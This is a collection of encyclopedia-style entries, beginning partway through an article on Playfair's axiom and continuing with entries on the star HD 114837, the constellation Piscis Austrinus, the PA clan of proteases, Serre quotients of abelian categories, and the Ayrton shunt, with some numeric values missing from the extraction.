Playfair acknowledged Ludlam and others for simplifying the Euclidean assertion. In later developments the point of intersection of the two lines came first, and the denial of two parallels became expressed as a unique parallel through the given point. In 1883 Arthur Cayley was president of the British Association and expressed this opinion in his address to the Association:

My own view is that Euclid's Twelfth Axiom in Playfair's form of it, does not need demonstration, but is part of our notion of space, of the physical space of our experience, which is the representation lying at the bottom of all external experience.

When David Hilbert wrote his book Foundations of Geometry (1899), providing a new set of axioms for Euclidean geometry, he used Playfair's form of the axiom instead of the original Euclidean version for discussing parallel lines.

Relation with Euclid's fifth postulate
Euclid's parallel postulate states:

If a line segment intersects two straight lines forming two interior angles on the same side that sum to less than two right angles, then the two lines, if extended indefinitely, meet on that side on which the angles sum to less than two right angles.
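In modern notation the postulate can be paraphrased as follows; the symbols t, l, m, α and β are introduced here for illustration and are not Euclid's own:

\[
\alpha + \beta < 180^\circ \;\Longrightarrow\; l \text{ and } m \text{ meet on the side of } t \text{ on which } \alpha \text{ and } \beta \text{ lie},
\]

where t is a transversal cutting the lines l and m, and α, β are the two interior angles on one side of t.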
The complexity of this statement, compared with Playfair's formulation, is certainly a leading contribution to the popularity of quoting Playfair's axiom in discussions of the parallel postulate.

Within the context of absolute geometry the two statements are equivalent, meaning that each can be proved by assuming the other in the presence of the remaining axioms of the geometry. This is not to say that the statements are logically equivalent (i.e., that one can be proved from the other using only formal manipulations of logic), since, for example, when interpreted in the spherical model of elliptical geometry one statement is true and the other is not. Logically equivalent statements have the same truth value in all models in which they have interpretations.

The proofs below assume that all the axioms of absolute (neutral) geometry are valid.

Euclid's fifth postulate implies Playfair's axiom
The easiest way to show this is using the Euclidean theorem (equivalent to the fifth postulate) that the angles of a triangle sum to two right angles. Given a line L and a point P not on L, construct a line t perpendicular to L through P, and then a perpendicular to t at P. This second line is parallel to L because it cannot meet L and form a triangle, as stated in Book 1 Proposition 27 of Euclid's Elements. Now it can be seen that no other parallels exist. If n were a second line through P, then n makes an acute angle with t (since it is not the perpendicular), so the hypothesis of the fifth postulate holds, and n therefore meets L.

Playfair's axiom implies Euclid's fifth postulate
Given that Playfair's postulate implies that only the perpendicular to the perpendicular is a parallel, the lines of the Euclid construction will have to cut each other in a point. It is also necessary to prove that they will do so on the side where the angles sum to less than two right angles, but this is more difficult.

Importance of triangle congruence
The classical equivalence between Playfair's axiom and Euclid's fifth postulate collapses in the absence of triangle congruence. This is shown by constructing a geometry that redefines angles in a way that respects Hilbert's axioms of incidence, order, and congruence, except for Side-Angle-Side (SAS) congruence. Such a geometry models the classical Playfair's axiom but not Euclid's fifth postulate.

Transitivity of parallelism
Proposition 30 of Euclid reads, "Two lines, each parallel to a third line, are parallel to each other." It was noted by Augustus De Morgan that this proposition is logically equivalent to Playfair's axiom, an observation recounted by T. L. Heath in 1908. De Morgan's argument runs as follows: let X be the set of pairs of distinct lines which meet, and Y the set of pairs of distinct lines each of which is parallel to a single common line. If z represents a pair of distinct lines, then the statement "for all z, if z is in X then z is not in Y" is Playfair's axiom (in De Morgan's terms, No X is Y), and its logically equivalent contrapositive, "for all z, if z is in Y then z is not in X", is Euclid I.30, the transitivity of parallelism (No Y is X).

More recently the implication has been phrased differently in terms of the binary relation expressed by parallel lines: in affine geometry the relation is taken to be an equivalence relation, which means that a line is considered to be parallel to itself. Andy Liu wrote, "Let P be a point not on line 2.
Suppose both line 1 and line 3 pass through P and are parallel to line 2. By transitivity, they are parallel to each other, and hence cannot have exactly P in common. It follows that they are the same line, which is Playfair's axiom."

Notes

References

Foundations of geometry
Playfair's axiom
Mathematics
1,650
36,921,375
https://en.wikipedia.org/wiki/HD%20114837
HD 114837 is a suspected binary star system in the southern constellation of Centaurus. The brighter star is faintly visible to the naked eye with an apparent visual magnitude of 4.90. It has a magnitude 10.2 candidate common proper motion companion at an angular separation of , as of 2014. The distance to this system, based on an annual parallax shift of as seen from Earth's orbit, is 59.3 light years. It is moving closer with a heliocentric radial velocity of −64 km/s, and will approach to within in around 240,600 years. The primary component is an F-type main-sequence star with a stellar classification of , showing a mild underabundance of iron in its spectrum. It is about 3.4 billion years old with 1.14 times the mass of the Sun and about 1.3 times the Sun's radius. This star is radiating 3.12 times the Sun's luminosity from its photosphere at an effective temperature of 6,346 K. References F-type main-sequence stars Centauri, 191 Centaurus Durchmusterung objects 0503 114837 064583 4989
HD 114837
Astronomy
248
23,992
https://en.wikipedia.org/wiki/Piscis%20Austrinus
Piscis Austrinus is a constellation in the southern celestial hemisphere. The name is Latin for "the southern fish", in contrast with the larger constellation Pisces, which represents a pair of fish. Before the 20th century, it was also known as Piscis Notius. Piscis Austrinus was one of the 48 constellations listed by the 2nd-century astronomer Ptolemy, and it remains one of the 88 modern constellations. The stars of the modern constellation Grus once formed the "tail" of Piscis Austrinus; in 1597 (or 1598), Petrus Plancius carved out a separate constellation and named it after the crane. Piscis Austrinus is a faint constellation, containing only one star brighter than 4th magnitude: Fomalhaut, which is 1st magnitude and the 18th-brightest star in the night sky. Fomalhaut is surrounded by a circumstellar disk, and possibly hosts a planet. Other objects within the boundaries of the constellation include Lacaille 9352, one of the brightest red dwarf stars in the night sky (though still too faint to see with the naked eye); and PKS 2155-304, a BL Lacertae object that is one of the optically brightest blazars in the sky.

Origins
Piscis Austrinus originated with the Babylonian constellation known simply as the Fish (MUL.KU). The professor of astronomy Bradley Schaefer has proposed that ancient observers must have been able to see as far south as Mu Piscis Austrini to define a pattern that looked like a fish; indeed, Mu Piscis Austrini is explicitly mentioned in the Almagest, and the constellation was inherited from Babylonian astronomy. Along with the eagle Aquila, the crow Corvus and the water snake Hydra, Piscis Austrinus was introduced to the Ancient Greeks around 500 BCE; these constellations marked the summer and winter solstices. In Greek mythology, this constellation is known as the Great Fish, portrayed as swallowing the water poured out by Aquarius, the water-bearer constellation. The two fish of the constellation Pisces are said to be the offspring of the Great Fish. In Egyptian mythology, this fish saved the life of the Egyptian goddess Isis, so she placed the fish and its descendants into the heavens as constellations of stars. In the 5th century BC, the Greek historian Ctesias wrote that the fish was said to have lived in a lake near Bambyce in Syria and to have saved Derceto, daughter of Aphrodite, and that for this deed it was placed in the heavens. For this reason, fish were sacred and not eaten by many Syrians.

Characteristics
Piscis Austrinus is bordered by Capricornus to the northwest, Microscopium to the southwest, Grus to the south, Sculptor to the east, and Aquarius to the north. Its recommended three-letter abbreviation, as adopted by the International Astronomical Union in 1922, is "PsA". Ptolemy called the constellation Ichthus Notios ("Southern Fish") in his Almagest; this was Latinised to Piscis Notius and used by the German celestial cartographers Johann Bayer and Johann Elert Bode. Bayer also called it Piscis Meridianus and Piscis Austrinus, while the French astronomer Nicolas-Louis de Lacaille called it Piscis Australis. The English Astronomer Royal John Flamsteed went with Piscis Austrinus, and most later authors followed him. The official constellation boundaries, as set by the Belgian astronomer Eugène Delporte in 1930, are defined by a polygon of four segments.
In the equatorial coordinate system, the right ascension coordinates of these borders lie between and , while the declination coordinates are between −24.83° and −36.46°. The whole constellation is visible to observers south of latitude 53°N.

Features

Stars
Ancient astronomers counted twelve stars as belonging to Piscis Austrinus, though one was later incorporated into nearby Grus as Gamma Gruis. Other stars became part of Microscopium. Bayer used the Greek letters alpha through mu to label the most prominent stars in the constellation. Ptolemy had catalogued Fomalhaut (Alpha Piscis Austrini) as belonging to both this constellation and Aquarius. Lacaille redrew the constellation, as it was poorly visible from Europe, adding pi and relabelling gamma, delta and epsilon as epsilon, eta and gamma, respectively. However, Baily and Gould did not uphold these changes, as Bayer's original chart was fairly accurate. Bode added tau and upsilon. Flamsteed gave 24 stars Flamsteed designations, though the first four numbered became part of Microscopium. Within the constellation's borders, there are 47 stars brighter than or equal to apparent magnitude 6.5.

Traditionally representing the mouth of the fish, Fomalhaut is the brightest star in the constellation and the 18th-brightest star in the night sky, with an apparent magnitude of 1.16. Located 25.13 ± 0.09 light-years away, it is a white main-sequence star that is 1.92 ± 0.02 times as massive and 16.63 ± 0.48 times as luminous as the Sun. Its companion Fomalhaut b was thought to be the first extrasolar planet ever detected in a visible-light image, thanks to the Hubble Space Telescope, but infrared observations have since undermined this claim: it is instead thought to be a spherical cloud of dust. TW Piscis Austrini can be seen close by and is possibly associated with Fomalhaut, as it lies within a light-year of it. Of magnitude 6.5, it is a BY Draconis variable.

The second-brightest star in the constellation, Epsilon Piscis Austrini, is a blue-white star of magnitude +4.17. Located 400 ± 20 light-years distant, it is a blue-white main-sequence star 4.10 ± 0.19 times as massive as the Sun and around 661 times as luminous. Beta, Delta and Zeta constitute the Tien Kang ("heavenly rope") in China. Beta is a white main-sequence star of apparent magnitude 4.29 that is of similar size and luminosity to Fomalhaut but five times as remote, at around 143 ± 1 light-years from Earth. Delta Piscis Austrini is a double star with components of magnitude 4.2 and 9.2. The brighter component is a yellow giant of spectral type G8 III; it is a red clump star that is burning helium in its core, and it lies 172 ± 2 light-years from Earth. Zeta Piscis Austrini is an orange giant star of spectral type K1III located 413 ± 2 light-years from Earth; it is a suspected variable star. S Piscis Austrini is a long-period Mira-type variable red giant which ranges between magnitude 8.0 and 14.5 over a period of 271.7 days, and V Piscis Austrini is a semi-regular variable ranging between magnitudes 8.0 and 9.0 over 148 days.

Lacaille 9352 is a faint red dwarf star of spectral type M0.5V that is just under half the Sun's diameter and mass. A mere 10.74 light-years away, it is too dim to be seen with the naked eye at magnitude 7.34. In June 2020, two super-Earth planets were discovered around it via the radial velocity method. Exoplanets have been discovered in five other star systems in the constellation.
HD 205739 is a yellow-white main-sequence star of spectral type F7 V that has a planet around 1.37 times as massive as Jupiter orbiting it with a period of 279 days, and there is a suggestion of a second planet. HD 216770 is an orange dwarf accompanied by a Jupiter-like planet every 118 days. HD 207832 is a star of spectral type G5V with a diameter and mass about 90% of those of the Sun, and around 77% of its luminosity. Two gas giant planets with masses around 56% and 73% of that of Jupiter were discovered around it in 2012 via the radial velocity method. With orbital periods of 162 and 1,156 days, they average around 0.57 and 2.11 astronomical units from their star. WASP-112 and WASP-124 are two Sun-like stars that have planets discovered by transit.

Deep sky objects
NGC 7172, NGC 7174 and NGC 7314 are three galaxies of magnitudes 11.9, 12.5 and 10.9, respectively. NGC 7259 is another spiral galaxy, which hosted a supernova, SN 2009ip, in 2009. At redshift z = 0.116, the BL Lacertae object PKS 2155-304 is one of the brightest blazars in the sky.

See also
Piscis Austrinus in Chinese astronomy

Notes

References

External links
Warburg Institute Iconographic Database (medieval and early modern images of Piscis Austrinus under the name Piscis magnus)
The clickable Piscis Austrinus

Constellations
Southern constellations
Constellations listed by Ptolemy
Piscis Austrinus
Astronomy
1,942
40,763,842
https://en.wikipedia.org/wiki/PA%20clan%20of%20proteases
The PA clan (Proteases of mixed nucleophile, superfamily A) is the largest group of proteases with common ancestry as identified by structural homology. Members have a chymotrypsin-like fold and similar proteolysis mechanisms, but can share less than 10% sequence identity. The clan contains both cysteine and serine proteases (different nucleophiles). PA clan proteases can be found in plants, animals, fungi, eubacteria, archaea and viruses. The common use of the catalytic triad for hydrolysis by multiple clans of proteases, including the PA clan, represents an example of convergent evolution. The differences in the catalytic triad within the PA clan are likewise an example of divergent evolution of active sites in enzymes.

History
In the 1960s, the sequence similarity of several proteases indicated that they were evolutionarily related. These were grouped into the chymotrypsin-like serine proteases (now called the S1 family). As the structures of these and other proteases were solved by X-ray crystallography in the 1970s and 80s, it was noticed that several viral proteases, such as Tobacco etch virus protease, showed structural homology despite no discernible sequence similarity and even a different nucleophile. Based on structural homology, a superfamily was defined and later named the PA clan (by the MEROPS classification system). As more structures are solved, more protease families have been added to the PA clan superfamily.

Etymology
The P refers to Proteases of mixed nucleophile. The A indicates that it was the first such clan to be identified (there also exist the PB, PC, PD and PE clans).

Structure
Despite retaining as little as 10% sequence identity, PA clan members isolated from viruses, prokaryotes and eukaryotes show structural homology and can be aligned by structural similarity (e.g. with DALI).

Double β-barrel
PA clan proteases all share a core motif of two β-barrels, with covalent catalysis performed by an acid-histidine-nucleophile catalytic triad motif. The barrels are arranged perpendicularly beside each other, with hydrophobic residues holding them together as the core scaffold of the enzyme. The triad residues are split between the two barrels so that catalysis takes place at their interface.

Viral protease loop
In addition to the double β-barrel core, some viral proteases (such as TEV protease) have a long, flexible C-terminal loop that forms a lid completely covering the substrate and creating a binding tunnel. This tunnel contains a set of tight binding pockets such that each side chain of the substrate peptide (P6 to P1') is bound in a complementary site (S6 to S1'), and specificity is endowed by the large contact area between enzyme and substrate. Conversely, cellular proteases that lack this loop, such as trypsin, have broader specificity.

Evolution and function

Catalytic activity
Structural homology indicates that the PA clan members are descended from a common ancestor with the same fold. Although PA clan proteases use a catalytic triad to perform two-step nucleophilic catalysis, some families use serine as the nucleophile whereas others use cysteine. The superfamily is therefore an extreme example of divergent enzyme evolution, since during evolutionary history the core catalytic residue of the enzyme has switched in different families. In addition to their structural similarity, directed evolution has been shown to be able to convert a cysteine protease into an active serine protease.
All cellular PA clan proteases are serine proteases; however, there are both serine and cysteine protease families of viral proteases. The majority are endopeptidases, the exception being the S46 family of exopeptidases.

Biological role and substrate specificity
In addition to divergence in their core catalytic machinery, the PA clan proteases also show wide divergent evolution in function. Members of the PA clan are found in eukaryotes, prokaryotes and viruses and encompass a wide range of functions. In mammals, some are involved in blood clotting (e.g. thrombin) and so have high substrate specificity, while others are involved in digestion (e.g. trypsin) with broad substrate specificity. Several snake venom components are also PA clan proteases, such as pit viper haemotoxins, which interfere with the victim's blood clotting cascade. Additionally, bacteria such as Staphylococcus aureus secrete exfoliative toxins, which digest and damage the host's tissues. Many viruses express their genome as a single, massive polyprotein and use a PA clan protease to cleave it into functional units (e.g. polio, norovirus, and TEV proteases). There are also several pseudoenzymes in the superfamily, in which the catalytic triad residues have been mutated and which therefore function as binding proteins. For example, the heparin-binding protein azurocidin has a glycine in place of the nucleophile and a serine in place of the histidine.

Families
Within the PA clan (P = proteases of mixed nucleophiles), families are designated by their catalytic nucleophile (C = cysteine proteases, S = serine proteases). Despite the lack of sequence homology for the PA clan as a whole, individual families within it can be identified by sequence similarity.

See also
Protease (cysteine-, serine-, threonine-, aspartic-, metallo-)
Catalytic triad
Homology (biology)
MEROPS
Protein family
Protein superfamily
Protein structure
Structural alignment

References

External links
MEROPS - Comprehensive protease database
Superfamily - A database of protein folds

EC 3.4
Molecular evolution
Proteases
Protein superfamilies
PA clan of proteases
Chemistry,Biology
1,259
48,897,477
https://en.wikipedia.org/wiki/Quotient%20of%20an%20abelian%20category
In mathematics, the quotient (also called Serre quotient or Gabriel quotient) A/B of an abelian category A by a Serre subcategory B is the abelian category which, intuitively, is obtained from A by ignoring (i.e. treating as zero) all objects from B. There is a canonical exact functor T : A → A/B whose kernel is B, and A/B is in a certain sense the most general abelian category with this property. Forming Serre quotients of abelian categories is thus formally akin to forming quotients of groups. Serre quotients are somewhat similar to quotient categories, the difference being that with Serre quotients all involved categories are abelian and all functors are exact. Serre quotients also often have the character of localizations of categories, especially if the Serre subcategory is localizing.

Definition
Formally, A/B is the category whose objects are those of A and whose morphisms from X to Y are given by the direct limit (of abelian groups) of the groups Hom_A(X', Y/Y'), where the limit is taken over subobjects X' ⊆ X and Y' ⊆ Y such that X/X' belongs to B and Y' belongs to B. (Here, X/X' and Y/Y' denote quotient objects computed in A.) These pairs of subobjects are ordered by declaring (X', Y') ≤ (X'', Y'') when X'' ⊆ X' and Y' ⊆ Y''. Composition of morphisms in A/B is induced by the universal property of the direct limit. The canonical functor T : A → A/B sends an object X to itself and sends a morphism to the corresponding element of the direct limit with X' = X and Y' = 0.

An alternative, equivalent construction of the quotient category uses what is called a "calculus of fractions" to define the morphisms of A/B. Here, one starts with the class of those morphisms in A whose kernel and cokernel both belong to B. This is a multiplicative system in the sense of Gabriel-Zisman, and one can localize the category A at this system to obtain A/B.

Examples
Let k be a field and consider the abelian category A of all vector spaces over k. Then the full subcategory B of finite-dimensional vector spaces is a Serre subcategory of A. The Serre quotient A/B has as objects the k-vector spaces, and the set of morphisms from V to W in A/B is the quotient of Hom_k(V, W) by the subspace of linear maps with finite-dimensional image. This has the effect of identifying all finite-dimensional vector spaces with 0, and of identifying two linear maps whenever their difference has finite-dimensional image. This example shows that the Serre quotient can behave like a quotient category.

For another example, take the abelian category Ab of all abelian groups and the Serre subcategory of all torsion abelian groups. The Serre quotient here is equivalent to the category of all vector spaces over the rationals, with the canonical functor given by tensoring with Q. Similarly, the Serre quotient of the category of finitely generated abelian groups by the subcategory of finitely generated torsion groups is equivalent to the category of finite-dimensional vector spaces over Q. Here, the Serre quotient behaves like a localization.

Properties
The Serre quotient A/B is an abelian category, and the canonical functor T : A → A/B is exact and surjective on objects. The kernel of T is B, i.e., T(X) is a zero object of A/B if and only if X belongs to B. The Serre quotient and canonical functor are characterized by the following universal property: if C is any abelian category and F : A → C is an exact functor such that F(X) is a zero object of C for each object X of B, then there is a unique exact functor G : A/B → C such that G ∘ T = F. Given three abelian categories A, B, C, we have A/B ≃ C if and only if there exists an exact and essentially surjective functor F : A → C whose kernel is B and such that every morphism of C can be written in the form F(h) ∘ F(g)⁻¹ for morphisms g and h of A with F(g) an isomorphism.
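For reference, the morphism groups of the Definition section can be written compactly as a filtered colimit; this display restates the prose definition above in the notation of this article and adds nothing new:

\[
\operatorname{Hom}_{\mathcal{A}/\mathcal{B}}(X, Y) \;=\; \varinjlim_{\substack{X' \subseteq X,\; Y' \subseteq Y \\ X/X' \in \mathcal{B},\; Y' \in \mathcal{B}}} \operatorname{Hom}_{\mathcal{A}}\bigl(X',\, Y/Y'\bigr).
\]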
Theorems involving Serre quotients

Serre's description of coherent sheaves on a projective scheme
According to a theorem by Jean-Pierre Serre, the category of coherent sheaves on a projective scheme Proj(R) (where R is a commutative noetherian graded ring, graded by the non-negative integers and generated by its degree-0 elements together with finitely many degree-1 elements, and Proj refers to the Proj construction) can be described as the Serre quotient of the category of finitely generated graded R-modules by the Serre subcategory consisting of all those graded modules M which are 0 in all sufficiently high degrees, i.e. for which there exists n₀ such that M_n = 0 for all n ≥ n₀. A similar description exists for the category of quasi-coherent sheaves on Proj(R), even if R is not noetherian.

Gabriel-Popescu theorem
The Gabriel-Popescu theorem states that any Grothendieck category is equivalent to a Serre quotient of the form Mod(R)/C, where Mod(R) denotes the abelian category of right modules over some unital ring R, and C is some localizing subcategory of Mod(R).

Quillen's localization theorem
Daniel Quillen's algebraic K-theory assigns to each exact category E a sequence of abelian groups K_n(E), and this assignment is functorial in E. Quillen proved that, if B is a Serre subcategory of the abelian category A, there is a long exact sequence of the form

... → K_n(B) → K_n(A) → K_n(A/B) → K_{n-1}(B) → ... → K_0(A) → K_0(A/B) → 0.

References

Category theory
Quotient of an abelian category
Mathematics
1,080
41,610,115
https://en.wikipedia.org/wiki/Ayrton%20shunt
The Ayrton shunt or universal shunt is a high-resistance shunt used in galvanometers to increase their range without changing the damping. The circuit is named after its inventor, William E. Ayrton. Multirange ammeters that use this technique are more accurate than those using a make-before-break switch, and the arrangement eliminates the possibility of the meter ever being in the circuit without a shunt, a serious concern with simple switched-shunt designs. The selector switch changes the amount of resistance in parallel with Rm (the meter resistance). The voltage drop across parallel branches is always equal. When the entire shunt resistance is placed in parallel with Rm, the ammeter reaches its maximum sensitivity. The Ayrton shunt is rarely used for currents above 10 amperes. The multiplying powers of the individual ranges are m1 = I1/Im, m2 = I2/Im and m3 = I3/Im, where Im is the full-scale meter current and I1, I2 and I3 are the corresponding range currents.

References

Sources

Electrical circuits
Electrical meters
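A sketch of the standard range calculation (the notation is introduced here for illustration and is not from the entry above): let R be the total shunt resistance permanently connected around the galvanometer branch, Rm the meter resistance, Im the full-scale meter current and I the total current being measured. The selected tap splits R into a section R1, which carries the bypass current directly, and a section R − R1, which is in series with the meter. Equating the voltage drops across the two parallel branches gives

\[
(I - I_m)\,R_1 = I_m\,(R_m + R - R_1)
\quad\Longrightarrow\quad
R_1 = \frac{R + R_m}{m}, \qquad m = \frac{I}{I_m},
\]

so each multiplying power m fixes the position of the corresponding tap. Whichever tap is selected, the galvanometer's closed loop always contains the full shunt resistance, so the loop resistance R + Rm is constant; this is why the range can be changed without changing the damping.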
Ayrton shunt
Technology,Engineering
186